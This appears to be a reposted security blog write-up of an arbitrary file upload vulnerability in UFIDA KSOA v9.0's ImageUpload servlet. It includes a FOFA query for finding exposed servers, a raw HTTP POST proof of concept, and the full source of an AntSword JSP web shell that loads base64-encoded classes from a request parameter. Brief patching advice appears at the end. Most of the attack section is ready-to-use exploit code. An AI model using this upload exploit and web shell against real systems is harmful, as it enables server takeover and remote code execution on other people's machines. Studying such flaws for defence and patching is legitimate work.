UFIDA KSOA ImageUpload Arbitrary File Upload Vulnerability Recurrence + Exploitation

News 2023-06-05 01:56:40 views: null

1. Product introduction

  UFIDA KSOA is a new-generation product developed under the guidance of the SOA concept. It is a unified IT infrastructure launched according to the cutting-edge I needs of distribution companies. It allows the IT systems established by distribution companies in various periods to communicate easily with each other. Help distribution companies protect original IT investment, simplify IT management, enhance competitiveness, and ensure the realization of the overall strategic goals and innovation activities of the company.

2. Vulnerability overview

   There is an arbitrary file upload vulnerability in the ImageUpload of UFIDA KSOA platform, through which an attacker can obtain server privileges. 

3. Scope of influence

  UFIDA Enterprise Information Integration Platform KSOA v9.0

4. Reproduce the environment

  FOFA:app="Yonyou-Time and Space KSOA"

5. Vulnerability recurrence

Burp grabs the home page package and sends it to the Repeater module for reproduction 

 POC

POST /servlet/com.sksoft.bill.ImageUpload?filename=[上传的文件名]&filepath=/ HTTP/1.1
Host: your-ip

[文件内容]

 

Reproduced successfully

6. Exploitation 

The page is written in java, directly try to upload ant sword jsp one sentence Trojan, password: passwd

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

Verify that it is parseable

No problem, open Ant Sword and try to connect (remember to delete the back door after testing)

 7. Repair suggestion

      Upgrade to a safe version or patch

      Reduce Internet exposure, limit uploaded file types, increase upload blacklist and whitelist constraints, etc.

Guess you like

Origin blog.csdn.net/qq_41904294/article/details/129954240
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com